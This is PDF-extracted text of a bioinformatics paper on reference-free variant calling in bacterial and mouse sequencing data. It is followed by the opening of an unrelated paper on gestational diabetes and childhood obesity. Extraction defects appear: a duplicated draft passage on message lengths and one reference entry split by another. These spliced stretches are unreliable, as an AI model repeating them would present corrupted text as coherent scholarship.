∑ i(mi−2k) be the total number of contexts in the read set (i.e., the total number of prefix and suffix pairs in the data). Thus, ( N+42k+1−1 42k+1−1 ) count distributions are possible amongst the number of total prefix and suffix pairs (4k×4k =42k distinct prefix/suffix pairs, and 4 possible observable bases), giving a total message length of ML(x;P̂(·|πk,σk)) :=L(x;P̂(·|πk,σk))+log ( N +42k+1−1 42k+1−1 ) . Approximating the R.H.S using Stirling’s approximation and dropping constant terms yields ML ∼ ∝ 2L(x;P̂(·|πk,σk))+2log(4) ( k−(1+2k)41+2k ) + ( 2 ( 41+2k+N ) −1 ) log ( N +41+2k ) . For suffix free densities the message length simplifies to ML(x;P̂(·|πk)) :=L(x;P̂(·|πk))+log ( N +4k+1−1 4k+1−1 ) ∼ ∝ 2L(x;P̂(·|πk))+log(4) ( k−2(1+k)41+k ) + ( 2 ( 41+k+N ) −1 ) log ( N +41+k ) , and similarly for prefix free. Prefix/suffix free contexts The method we have presented so far has been developed for any contexts defined by any combination of prefix and suffix. The question of whether prefix/suffix-free contexts or full contexts (both prefix and suffix) naturally arises. The decision depends on the type of variants of interest: using full contexts will restrict the variants to single nucleotide variants (SNV), while one sided contexts allow for more general types of variants such as insertions and deletions. Full contexts also have less power to detect variation caused by close-by SNVs; two SNVs in close proximity will create several different contexts when modelling with both prefixes and suffixes. It is also worth remarking that the choice between prefix and suffix free contexts is immaterial under the assumption of independent noise and sufficient coverage. Thus, our experiments concentrate on suffix-free contexts as it is the more general case. Reference-based variant calling To compare the ability of our proposed method to a reference-based approach, we have processed all datasets using a standard mapping-based SNP calling pipeline. Using Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 SAMtools v1.2-34, raw reads from each sample were mapped to the relevant reference sequence and sorted. The mapped reads are then further processed to remove duplicates arising from PCR artefacts using Picard v1.130 and to realign reads surrounding indels using GATK v3.3-0. Pileups are then created across all samples using SAMtools and SNPs are called using the consensus-method of BCFtools v1.1-137. The resulting SNPs were then filtered to remove those variants with phred-scaled quality score below 20, minor allele frequency below 0.01 or SNPs that were called in less than 10% of samples. RESULTS Simulation study We first investigate the power and the false positive rate (FPR) of our method by simulations as minor allele frequency (MAF), sequencing depth, and sample size are varied. A total of 3,000 contexts per sample, of which one was a variant site with two possible alleles across the population, were simulated by sampling counts from a multinomial distribution. This corresponds to a simulating a SNP, indel or any other variant whose first base, i.e., the base directly following the context, is bi-allelic. Each context was simulated with a sequencing read error of 1% by sampling from a multinomial distribution, with the total number of simulations per context determined by the specified sequencing depth. Variants were determined by fitting a gamma distribution and rejecting at a level of p<0.05 corrected for multiple testing by Bonferroni’s method. This procedure is repeated 1,000 times for each combination of simulation parameters. Figures 1 and 2 shows the results of the simulation. With a depth of 25 our method is able to recover the variant site with high power when the MAF is 20% or higher, even with few samples (50). The FPR was also well controlled, but reduces sharply with moderate depth (>25) at 100 samples, and is low at most depth for 1,000 samples. Identification of rare variants at low sample sizes (1% MAF at 100 samples) is not reliable, however rare variants are still identifiable with high power at high depth and samples (depth greater than 64 and 1,000 samples). Empirical experiments We also evaluated our method on three different datasets: two datasets are of Streptococcus pneumoniae bacteria, one collected in Massachusetts (Croucher et al., 2013) and the other in Thailand (Chewapreecha et al., 2014a); and one mouse dataset (Fairfield et al., 2011). The two S. pneumoniae datasets comprise 681 and 3,369 samples sequenced using Illumina sequencing technology. The Jax6 mouse dataset (Fairfield et al., 2011) contains sequenced exomes of 16 inbred mouse lines. All experiments were conducted with suffix-free contexts and only contexts present across all samples were evaluated for variants. Our method identified 40,071 variants in the Massachusetts dataset, 57,050 in the Thailand dataset, and 50,000 in the mouse dataset. We refer to these as KL variants. We also compare our method with a mapping-based SNP calling approach on the S. pneumoniae datasets. Using sequence for S. pneumoniae ATCC 700669 (NCBI accession NC_011900.1) as a reference, there were 181,511 and 251,818 SNPs called for the Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 7/16 https://peerj.com https://www.ncbi.nlm.nih.gov/nucleotide?term=NC_011900.1 http://dx.doi.org/10.7717/peerj-cs.71 Figure 1 Power curves for 3,000 simulated contexts with a single variant context for varying depth and sample size (panels). The bi-allelic variant context was simulated 1,000 times and curves show the mean of the 1,000 simulations. The error for the mean is less than 3% in all cases. Figure 2 False positive rate for 3,000 simulated contexts with a single variant context for varying depth and sample size (panels) as described in Fig. 1. The error for the mean is less than 3% in all cases. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 1e+08 1e+09 1e+10 5 10 15 20 k M es sa ge le ng th Jax6 Strep. (Mass.) Strep. (Th.) Figure 6: Message length for prefix-only contexts on two S. pneumoniae samples from the Massachusetts and Thailand datasets, and the 129S1/SvImJ mouse line from the Jax6 dataset. The optimal k under the MML framework is k = 14 for the S. pneumoniae Massachusetts dataset, k = 13 for the S. pneumoniae Thailand dataset, and k = 15 for Jax6. To evaluate the stability of the message length criterion, the optimal k according to message344 length was calculated on all samples from the Massachusetts data (table 4). The majority345 of samples had an optimal length of k = 14, with the remainder being optimal at k = 13.346 Investigation into the singleton sample with minimal length at k = 8 revealed a failed sequencing347 with only 18,122 reads present. We also evaluated all samples present in the Jax6 dataset and348 found all but one sample had minimal message length at k = 15. The stability of k is therefore349 high and we use k = 14 for the two S. pneumoniae datasets and k = 15 for the Jax6 mouse dataset350 henceforth in all experiments.351 Table 4: Proportion of samples in Massachusetts data by optimal k. Optimal k Count 8 1 13 304 14 376 13 Figure 3 Message length for prefix-only contexts on two S. pneumoniae samples from the Massachusetts and Thailand datasets, and the 129S1/SvImJ mouse line from the Jax6 dataset. The optimal k under the MML framework is k = 14 for the S. pneumoniae Massachusetts datasets, k = 13 for the S. pneumoniae Thailand dataset, and k=15 for Jax6. Massachusetts and Thailand datasets. To be comparable with the resulting binary SNPs calls, we transform our multi-allelic variants to binary variants with the major allele being one and other alleles being zero. Finally, we compare our results with variants called by another reference-free caller DiscoSNP++ (Uricaru et al., 2015) (v2.2.1). DiscoSNP++ finds 8,728 variants for the Massachusetts S. pneumoniae data, and 290,615 variants for Jax6. DiscoSNP++ results are not available on the Thailand dataset as the software fails to run in reasonable time on such a large dataset. Message lengths Our first experiment investigated the optimal k resulting from our message length criterion (see ‘Choosing context size’). Figure 3 shows the results of various contexts sizes on three samples, one from each of the Massachusetts S. pneumoniae, Thailand S. pneumoniae and Jax6 mouse data. The S. pneumoniae Massachusetts and Thailand samples had the shortest message length at k=14 and k=13 respectively, and the 129S1/SvImJ mouse line had the shortest message length at k=15. To evaluate the stability of the message length criterion, the optimal k according to message length was calculated on all samples from the Massachusetts data (Table 1). The majority of samples had an optimal length of k =14, with the remainder being optimal at k=13. Investigation into the singleton sample with minimal length at k=8 revealed a failed sequencing with only 18,122 reads present. We also evaluated all samples present in the Jax6 dataset and found all but one samples had minimal message length at k=15. The stability of k is therefore high and we use k =14 for the two S. pneumoniae datasets and k=15 for the Jax6 mouse dataset henceforth in all experiments. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 Table 1 Count of samples in Massachusetts data by optimal k. Optimal k Count 8 1 13 304 14 376 Table 2 AMR prediction results using KL variants. Variants were discovered only on the Massachusetts dataset and then called on both Massachusetts and Thailand datasets. Each row indicates what dataset models were trained on and the columns denote the testing dataset. Numbers are the Area Under the Re- ceiver Operating Characteristic (AROC). The AROC was estimated using 10-fold cross-validation within datasets. The numbers in parentheses are the performance when predicting on standard SNP calls (S) de- rived through a traditional alignment pipeline and DiscoSNP++ (D) calls. DiscoSNP++ results are not available on the Thailand dataset as the software fails to run in reasonable time on such a large dataset. Training dataset Massachusetts Thailand All Massachusetts 95.6 (S: 94.4, D: 96.6) 81.3 (S: 88.6) Thailand 72.5 (S: 66.8) 97.6 (S: 97.6) All 97.1 Supervised learning performance To investigate the robustness of our variants for genomic prediction tasks, we evaluated the ability of variants called on the Massachusetts S. pneumoniae dataset for the prediction of Benzylpenicillin resistance under different training and testing scenarios across the two S. pneumoniae datasets. Each sample was labelled as resistant if the minimum inhibitory concentration exceeded 0.063 µg/mL (Chewapreecha et al., 2014b). In all tasks, a support vector machine (SVM) (Schölkopf & Smola, 2001) was used to predict resistance from the variants, and the performance measured using the Area under the Receiver Operating Characteristic (AROC). Table 2 shows the results of the experiments. Each row indicates what dataset models were trained on and the columns denote the testing dataset. For intra-dataset experiments (i.e., the diagonal), AROC was estimated using 10-fold cross validation. Our variants are clearly capturing the various resistance mechanisms, as evident by the strong 10-fold cross validation predictive performance. In comparison to the traditional pipeline and DiscoSNP++ features (on Massachusetts data only) also performed well. Given the high level of accuracy, the three methods do not differ significantly in performance. The model trained using our variants on the Massachusetts data is moderately predictive on the Thailand dataset. Conversely, the model from the Thailand dataset can also moderately predict resistance in the Massachusetts data, but to a lesser degree. One possible explanation for this limited predictive ability is the existence of resistance mechanisms unique to each dataset, hence a model trained on one dataset will not capture unobserved mechanisms and consequently the model is unable to predict resistance arising form these unknown mechanisms. This hypothesis is supported by the strong performance observable on the diagonal: when combining both datasets and preforming cross-validation, the performance is high. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 Figure 4 ROC produced from leave-one-out cross-validation performance predicting agouti coat colour from KL variants on Jax6 mouse dataset. AROC is 96%. We also evaluated our variants for predicting coat colour on the Jax6 mouse dataset (Fairfield et al., 2011). As few samples are available (14 labelled samples), we reduced the problem to a 2-class classification problem, classifying coat colour into agouti or not. This led to a well balanced classification problem with 8 samples in the agouti classes and 6 not. The performance for this task was estimated at 96% AROC using leave-one-out (LOOCV) cross-validation, suggesting the variants are also predictive of heritable traits in higher level organisms. Fig. 4 shows the ROC for this classification problem. Population structure Finally, we investigate the population structure captured by KL variants and the SNP calls on the Massachusetts dataset. The population structures were estimated using Principle Component Analysis (PCA), a common approach whereby the top principal components derived across all genetic variants reflect underlying population structure rather than the studied phenotype of interest (Price et al., 2010). Five sub-populations (clusters) were identified using k-means on the first two principal components from the SNP data. Projecting those 5 clusters on to the principal component scores of our variants (Fig. 5) results in highly concordant plots. Four out of the five clusters can be easily identified using our variants, indicating the detected variation preserves population structures well. A canonical correlation analysis (CCA) was performed to further assess the similarities between the two feature sets (Table 3). Regularisation was used to find the canonical vectors as the cross-covariance matrices are singular for our dataset. As there are significantly more features than samples, regularised CCA was used and the correlation between projections estimated using 100 samples of leave-one-out bootstrap (Hastie, Tibshirani & Friedman, Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 Figure 5 First two principal components derived from alignment-based SNP calls (A) and from vari- ants detected by our method (B) applied to the Massachusetts S. pneumoniae dataset. Each point repre- sents a sample and the colours denotes the cluster assignment determined by k-means clustering. The sim- ilar pattern of samples in each plot indicates that the same population structure signal is detected by the two variant detection methods. Table 3 Correlation coefficients for first 5 CCA components, estimated using 10-fold cross-validation on Massachusetts data. Component Correlation coefficient (±95% CI) 1 0.873±0.014 2 0.880±0.006 3 0.877±0.007 4 0.862±0.007 5 0.867±0.008 2013). We found the first three components explain all the variance (99%), with the first component alone explaining 76%. Therefore, both mapping-based SNPs and KL variants are largely capturing the same variance on the Massachusetts data. Analysis of contexts To further elucidate the type of variants that are being discovered by our method, we aligned the significant contexts from the Massachusetts dataset to the S. pneumoniae reference. Of the contexts, less than 1% failed to align, 41% aligned in a single location, and the remainder aligned in two or more locations. One context aligned in 82 different locations in the reference genome. Further investigation revealed the context corresponds to a boxB repeat sequence. Such repeats have previously been used to identify population structure of S. pneumoniae isolates carrying the 12F serotype, supporting our population structure findings (Rakov, Ubukata & Robinson, 2011). This suggests the variants may be tagging more complex structural elements than just single nucleotide variants. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 CONCLUSIONS We presented a novel reference-free variant detection method for next-generation sequence data. Our method has the advantage of no tuning parameters, rapid calling of known variants on new samples, and may be suited for targeted genotyping once a known set of variants are obtained. Simulation experiments showed the method is relatively robust and has good power and FPR to detect common variants, but for rare variants the power was lower and a high depth and number of samples were required to reliably detect them. In a typical genomic prediction setting the method was able to predict heritable phenotypes on both a bacterial dataset (anti-microbial resistance) and on a mouse dataset (coat-colour). On the S. pneumoniae datasets, our method was shown to have similar performance to a standard alignment-based SNP calling pipeline, with its requirements for a suitable reference genome. Moreover, the method was shown to capture the same population structure on the Massachusetts Streptococcus bacterial datasets as an alignment- based variant calling approach. These results show our method is capable of capturing important genomic features without a known reference. As with other reference-free variant calling methods, interpretation of the detected variants is more difficult compared to a mapping-based approach as called variants are reported without positional information. One approach to obtain such annotations is to map the variant and its context back to a given reference. Given that most sequences with a length greater than 15bp that exist in a given bacterial reference will have a unique mapping, many variants could be easily mapped back. However, such information is unlikely to exist for variants that do not occur in the reference, or may be misleading for variants that arise through complicated procedures such as horizontal gene transfer. Alternatively, variants and their context could be examined via BLAST searches to determine whether these sequences correspond to previously identified genes or other genomic features. In our experiments we used a combination of these approaches to investigate some of the variants found on the bacterial dataset. We identified contexts that mapped to numerous locations in the reference genome and then used BLAST to identify the likely origin of the sequence. Through this method, variants associated with boxB repeat sequence were found, suggesting our method is capturing variance associated with complex structures. We envisage that the method proposed here could be used to conduct a rapid initial analysis of a given dataset, such as species identification, outbreak detection or genomic risk prediction. Our method also enables analysis of data without a suitable reference while still avoiding the computationally expensive step of assembly. Furthermore, our method scales linearly with the total number of reads, allowing application to large datasets. The statistical framework established in this work is quite general and could be expanded in several ways. While we have examined only single nucleotide variants within this work, insertions and deletions could be explicitly modelled within this framework at the cost of increased computational expense. It may also be possible to model other types of variants, such as microsatellites, provided that a suitable representation for them could be found. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 ACKNOWLEDGEMENTS We thank Thomas Conway and Noel Faux for helpful discussions. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Justin Bedo conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Benjamin Goudey performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • Jeremy Wazny performed the experiments, wrote the paper, reviewed drafts of the paper. • Zeyu Zhou performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The research in this article did not generate any raw data and all experiments were conducted on publicly available data. The Jax6 mouse exome data is available from http://phenome.jax.org/db/q?rtn=projects/ projdet&reqprojid=466. The bacterial isolates are available from the SRA. The accessions are available in Supplemental Information 1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.71#supplemental-information. REFERENCES Beroukhim R, Mermel CH, Porter D, Wei G, Raychaudhuri S, Donovan J, Barretina J, Boehm JS, Dobson J, Urashima M, Henry KTM, Pinchback RM, Ligon AH, Cho YJ, Haery L, Greulich H, Reich M, Winckler W, Lawrence MS, Weir BA, Tanaka KE, Chiang DY, Bass AJ, Loo A, Hoffman C, Prensner J, Liefeld T, Gao Q, Yecies D, Signoretti S, Maher E, Kaye FJ, Sasaki H, Tepper JE, Fletcher JA, Tabernero J, Baselga J, Tsao MS, Demichelis F, Rubin MA, Janne PA, Daly MJ, Nucera C, Levine RL, Ebert BL, Gabriel S, Rustgi AK, Antonescu CR, Ladanyi M, Letai A, Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 14/16 https://peerj.com http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid=466 http://phenome.jax.org/db/q?rtn=projects/projdet&reqprojid=466 http://dx.doi.org/10.7717/peerj-cs.71/supp-1 http://dx.doi.org/10.7717/peerj-cs.71#supplemental-information http://dx.doi.org/10.7717/peerj-cs.71#supplemental-information http://dx.doi.org/10.7717/peerj-cs.71 Garraway LA, Loda M, Beer DG, True LD, Okamoto A, Pomeroy SL, Singer S, Golub TR, Lander ES, Getz G, Sellers WR, Meyerson M. 2010. The landscape of somatic copy-number alteration across human cancers. Nature 463(7283):899–905 DOI 10.1038/nature08822. Chewapreecha C, Harris SR, Croucher NJ, Turner C, Marttinen P, Cheng L, Pessia A, Aanensen DM, Mather AE, Page AJ, Salter SJ, Harris D, Nosten F, Goldblatt D, Corander J, Parkhill J, Turner P, Bentley SD. 2014a. Dense genomic sampling identifies highways of pneumococcal recombination. Nature genetics 46(3):305–309 DOI 10.1038/ng.2895. Chewapreecha C, Marttinen P, Croucher NJ, Salter SJ, Harris SR, Mather AE, Hanage WP, Goldblatt D, Nosten FH, Turner C, Turner P, Bentley SD, Parkhill J. 2014b. Comprehensive identification of single nucleotide polymorphisms associated with beta-lactam resistance within pneumococcal mosaic genes. PLoS Genetics 10(8):e1004547 DOI 10.1371/journal.pgen.1004547. Croucher NJ, Finkelstein JA, Pelton SI, Mitchell PK, Lee GM, Parkhill J, Bentley SD, Hanage WP, Lipsitch M. 2013. Population genomics of post-vaccine changes in pneumococcal epidemiology. Nature Genetics 45(6):656–663 DOI 10.1038/ng.2625. Fairfield H, Gilbert GJ, Barter M, Corrigan RR, Curtain M, Ding Y, D’Ascenzo M, Gerhardt DJ, He C, Huang W, Richmond T, Rowe L, Probst FJ, Bergstrom DE, Murray SA, Bult C, Richardson J, Kile BT, Gut I, Hager J, Sigurdsson S, Mauceli E, Di Palma F, Lindblad-Toh K, Cunningham ML, Cox TC, Justice MJ, Spector MS, Lowe SW, Albert T, Donahue L, Jeddeloh J, Shendure J, Reinholdt LG. 2011. Mutation discovery in mice by whole exome sequencing. Genome Biology 12(9):R86 DOI 10.1186/gb-2011-12-9-r86. Hastie T, Tibshirani R, Friedman J. 2013. The elements of statistical Learning: data mining, inference, and prediction, Second Edition (Springer Series in Statistics). 2nd edition. 2009. corr. 7th printing. New York: Springer-Verlag. Iqbal Z, Caccamo M, Turner I, Flicek P, McVean G. 2012. De novo assembly and geno- typing of variants using colored de Bruijn graphs. Nature genetics 44(2):226–232 DOI 10.1038/ng.1028. Kamary K, Mengersen K, Robert CP, Rousseau J. 2014. Testing hypotheses via a mixture estimation model. ArXiv preprint. arXiv:1412.2044. Li H. 2012. Exploring single-sample SNP and INDEL calling with whole-genome de novo assembly. Bioinformatics 28(14):1838–1844 DOI 10.1093/bioinformatics/bts280. Ochman H, Lawrence JG, Groisman EA. 2000. Lateral gene transfer and the nature of bacterial innovation. Nature 405(6784):299–304 DOI 10.1038/35012500. Peterlongo P, Schnel N, Pisanti N, Sagot MF, Lacroix V. 2010. Identifying SNPs without a reference genome by comparing raw reads. In: String processing and information retrieval. Berlin Heidelberg: Springer, 147–158. Price AL, Zaitlen NA, Reich D, Patterson N. 2010. New approaches to population strati- fication in genome-wide association studies. Nature Reviews Genetics 11(7):459–463 DOI 10.1038/nrg2813. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 15/16 https://peerj.com http://dx.doi.org/10.1038/nature08822 http://dx.doi.org/10.1038/nature08822 http://dx.doi.org/10.1038/ng.2895 http://dx.doi.org/10.1038/ng.2895 http://dx.doi.org/10.1371/journal.pgen.1004547 http://dx.doi.org/10.1038/ng.2625 http://dx.doi.org/10.1186/gb-2011-12-9-r86 http://dx.doi.org/10.1186/gb-2011-12-9-r86 http://dx.doi.org/10.1038/ng.1028 http://dx.doi.org/10.1038/ng.1028 http://arXiv.org/abs/1412.2044 http://dx.doi.org/10.1093/bioinformatics/bts280 http://dx.doi.org/10.1038/35012500 http://dx.doi.org/10.1038/nrg2813 http://dx.doi.org/10.1038/nrg2813 http://dx.doi.org/10.7717/peerj-cs.71 Rakov AV, Ubukata K, Robinson DA. 2011. Population structure of hyperinvasive serotype 12F, clonal complex 218 Streptococcus pneumoniae revealed by multilocus boxB sequence typing. Infection, Genetics and Evolution 11(8):1929–1939 DOI 10.1016/j.meegid.2011.08.016. Schölkopf B, Smola AJ. 2001. Learning with kernels: support vector machines, regular- ization, optimization, and beyond (adaptive computation and machine learning). 1st. Cambridge: MIT Press. Sokal RR, Rohlf FJ. 1994. Biometry: the principles and practices of statistics 406 in biological research. 3rd edition. New York: W. H. Freeman. Uricaru R, Rizk G, Lacroix V, Quillery E, Plantard O, Chikhi R, Lemaitre C, Peter- longo P. 2015. Reference-free detection of isolated SNPs. Nucleic Acids Research 43(2):e11–e11 DOI 10.1093/nar/gku1187. Wallace CS, Boulton DM. 1968. An information measure for classification. The Computer Journal 11(2):185–194 DOI 10.1093/comjnl/11.2.185. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 16/16 https://peerj.com http://dx.doi.org/10.1016/j.meegid.2011.08.016 http://dx.doi.org/10.1093/nar/gku1187 http://dx.doi.org/10.1093/comjnl/11.2.185 http://dx.doi.org/10.7717/peerj-cs.71 work_miwaidddzvcp3gsopaxl4ly7ae ---- 7:12 1464–1471J Wang et al. GDM and offspring’s obesity RESEARCH Maternal gestational diabetes and different indicators of childhood obesity: a large study Jing Wang1,2, Leishen Wang1, Huikun Liu1, Shuang Zhang1, Junhong Leng1, Weiqin Li1, Tao Zhang1, Nan Li1, Wei Li1, Andrea A Baccarelli3, Lifang Hou4 and Gang Hu2 1Tianjin Women’s and Children’s Health Center, Tianjin, China 2Chronic Disease Epidemiology Laboratory, Pennington Biomedical Research Center, Baton Rouge, Louisiana, USA 3Department of Environmental Health Sciences, Columbia University Mailman School of Public Health, New York, New York, USA 4Department of Preventive Medicine, Feinberg School of Medicine, Northwestern University, Chicago, Illinois, USA Correspondence should be addressed to G Hu: gang.hu@pbrc.edu Abstract Previous studies found conflicting results about the associations between the exposure to hyperglycemia in utero and the later risks of childhood overweight and obesity. The aim of the present study is to compare the children’s BMI growth between offspring exposed to maternal gestational diabetes mellitus (GDM) and those not exposed and assess the associations between maternal GDM and their offspring’s overweight and obesity risk. We performed a large observational study in 1156 women and their offspring (578 GDM and 578 non-GDM mother–child pairs, matched by their offspring’s gender and age). Maternal GDM was diagnosed according to the World Health Organization criteria. Childhood height, weight, waist circumference, body fat and skinfold were measured using standardized methods. After adjustment for maternal and children’s characteristics, children born to mothers with GDM during pregnancy had higher mean values of Z scores for BMI-for-age, Z scores for weight-for-age, waist circumferences, body fat, subscapular skinfold and suprailiac skinfold, in comparison with their counterparts born to mothers with normal glucose during pregnancy (all P values <0.05). Moreover, maternal GDM was associated with a higher risk of childhood overweight and obesity with multivariate-adjusted odds ratios of 1.42 (95% confidence interval (CI): 1.02–1.97) and 1.18 (95% CI: 1.11–1.24), respectively, compared with the children of mothers without GDM during pregnancy. This study demonstrates that maternal GDM is an independent risk factor of childhood overweight and obesity and is associated with higher BMI in the offspring. Introduction The worldwide rise in over-nutrition, sedentary life and obesity has resulted in a steep increase in the number of women who develop gestational diabetes mellitus (GDM) during pregnancy (1). Nearly 7% of pregnancies in the United States were affected by GDM, which is defined as any degree of glucose intolerance with onset or first recognition during pregnancy (2). The global prevalence of GDM ranged from 5.8 to 12.9% (3). Women with prior GDM are known to increase the risk of hypertensive disorders of pregnancy, the need for cesarean delivery, the possibility of fetal macrosomia (1) and the long-term risk of developing type 2 diabetes in later life, compared with non-GDM women (4). With respect to the long-term effects on the growth and development of children with GDM mothers, there are conflicting findings in previous studies. In the -18-0449 Key Words f gestational diabetes mellitus f childhood obesity f maternal glucose levels f childhood growth f early childhood risk factors Endocrine Connections (2018) 7, 1464–1471 ID: 18-0449 7 12 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd mailto:gang.hu@pbrc.edu https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14657:12 Northwestern Diabetes in Pregnancy Study in Chicago, diabetes during pregnancy (GDM and preexistent diabetes) was positively associated with the offspring’s BMI at birth and after 5 years old (5, 6). The offspring of Pima Indian women with preexistent diabetes and GDM had much higher rates of obesity at age 5–19 years, compared with their counterparts born to prediabetic and nondiabetic women (7, 8). However, these differences may be due to the high type 2 diabetes (T2D) risk in the specialized population from the Pima Indians and a specialized pregnancy clinical population in Chicago (9). Regarding to the general population, two recent studies from the Hyperglycemia and Adverse Pregnancy Outcome study (HAPO) (10) and Kaiser Permanente Northwest and Hawaii (11) presented that maternal hyperglycemia during pregnancy increased the offspring’s risk of overweight and obesity among 7-year-old girls and during the first decade among normal birth weight infants, respectively. However, other studies did not find a clear association between maternal GDM and obesity in offspring of more than 5 years old (12, 13, 14). Thus, more studies are expected to provide evidence and illustrate the impact of GDM on children’s growth and development. The present study aims to compare different indicators of childhood obesity between offspring exposed to maternal GDM and those not exposed and assess the associations between maternal GDM and their offspring’s overweight and obesity risk. Methods GDM screening process We used a two-step approach in the GDM diagnosis in Tianjin, China. We first invited all pregnant women (at their 26–30 gestational weeks) to participate in a 1-h oral glucose tolerance test (OGTT) with 50 g glucose load in their community health centers. Then, those whose glucose reading ≥7.8 mmol/L were referred to the Tianjin Women’s and Children’s Health Center to undergo a 2-h OGTT with 75 g glucose load. If the pregnant women met the 1999 World Health Organization (WHO)’s criteria of diabetes (fasting glucose ≥7 mmol/L or 2-h glucose ≥11.1 mmol/L) or impaired glucose tolerance (IGT) (2-h glucose ≥7.8 mmol/L and <11.1 mmol/L), they would be diagnosed as GDM (15). From 1999, all pregnant women living in the six urban districts of Tianjin have been screened for GDM (16). Study population We conducted a large study in 578 GDM mother–child pairs and their 578 counterparts with non-GDM mothers, matched by children’s genders and ages. The GDM mothers came from the Tianjin Gestational Diabetes Mellitus Prevention Program (17), a randomized controlled trial conducted among GDM women living in the six urban districts in Tianjin. A total of 4644 eligible women, who were diagnosed with GDM between 2005 and 2009, were invited to join the program by mailing. During August 2009 to July 2011, a total of 1263 GDM women at their postpartum 1–5 years finished the baseline survey. Of them, 83 were diagnosed as having type 2 diabetes, and the rest 1180 GDM women then attended the Tianjin Gestational Diabetes Mellitus Prevention Program. The recruitment, inclusion and exclusion criteria have been described in detail elsewhere (17). We randomly chose 578 GDM mother–child pairs who finished the year 1 or 2 follow-up survey and also stored blood samples. Simultaneously, we also enrolled 578 non-GDM mother–child pairs, with age and sex frequency matched to the 578 children of GDM mothers (Fig. 1). We collected written informed consents from all Tianjin GDM Screening 76,325 pregnant women (26-30wk) in Tianjin, China (2005 to 2009) 4,644 women with GDM 71,681 women without GDM 1,688 GDM women were willing to make an appointment 2,956 were excluded 1,303 (28.1%) eligible finished baseline survey 385 were excluded 40 were excluded 1,263 (27.2%) eligible finished baseline survey (completed a self-reported questionnaire and underwent a physical examination.) Follow-up Surveys Case Group 578 GDM mother-child pairs were randomly chosen from participants who finished the Year 1 or 2 follow-up visit and also stored blood samples Control Group 578 non-GDM mother-child pairs were enrolled, matched by children’s gender and age Figure 1 Flow chart. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14667:12 participants, and this study was approved by the Human Subjects Committee of Tianjin Women’s and Children’s Health Center. Mothers’ information was collected by a self- administered questionnaire, including socio-demographic characteristics, such as age, marital status, education (<13, 13–16, and ≥16 years), family income (<5000, 5000–8000 and ≥8000 yuan/month), and occupation; pregnancy outcomes (prepregnancy weight, weight gain during pregnancy, gestational age and the number of births in the index pregnancy) and lifestyle in the past year, such as smoking status (non-smokers, former smokers and current smokers), passive smoking, drinking status, sitting time and leisure-time physical activity (0, 1–29, and ≥30 min/ day). Children’s information was collected by another questionnaire completed by their mothers, including children’s general information, such as gender, birth date, age, birth weight, birth length, the mode of infant feeding within the first 6 months (exclusive formula, mixed breast and formula or exclusive breast) and lactation duration; history of diseases and medication; dietary habits (using a validated food frequency questionnaire (FFQ) (18)) and routine activities (indoor and outdoor activities, screening watching time and sleep duration). All mother–child pairs underwent a physical examination. Using the standardized protocol, all participants’ height and weight were measured in light indoor clothing and without shoes by trained research doctors. Moreover, the children’s physical examination also included the measurement of body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold. Body weight was measured with a beam balance scale to the nearest 0.1 kg; height was measured by a stadiometer to the nearest 0.1 cm. Waist circumference was measured midway between the 10th rib and the top of the iliac crest to the nearest 0.1 cm. Body fat was measured by a body composition analyzer (InBody J20) to the nearest 0.1%. Triceps skinfold, subscapular skinfold and suprailiac skinfold were measured by skinfold caliper to the nearest 0.5 cm. Calculation of BMI BMI was obtained by dividing weight in kilograms by the square of height in meters. All mothers’ prepregnancy BMI calculation used their self-reported prepregnancy weight and their height. According to the Chinese BMI cut-offs (19), prepregnancy BMI was categorized as <24, 24–27.9 and ≥28 kg/m2. Children’s BMI calculation used their body weight and height examined in the study visit. Children’s Z scores and overweight/obesity Children’s Z scores (including Z scores for height-for- age (Z-height), Z scores for weight-for-age (Z-weight), Z scores for BMI-for-age (Z-BMI)), calculated based on the protocol from the WHO, are gender-independent classification systems, representing equivalent height/ 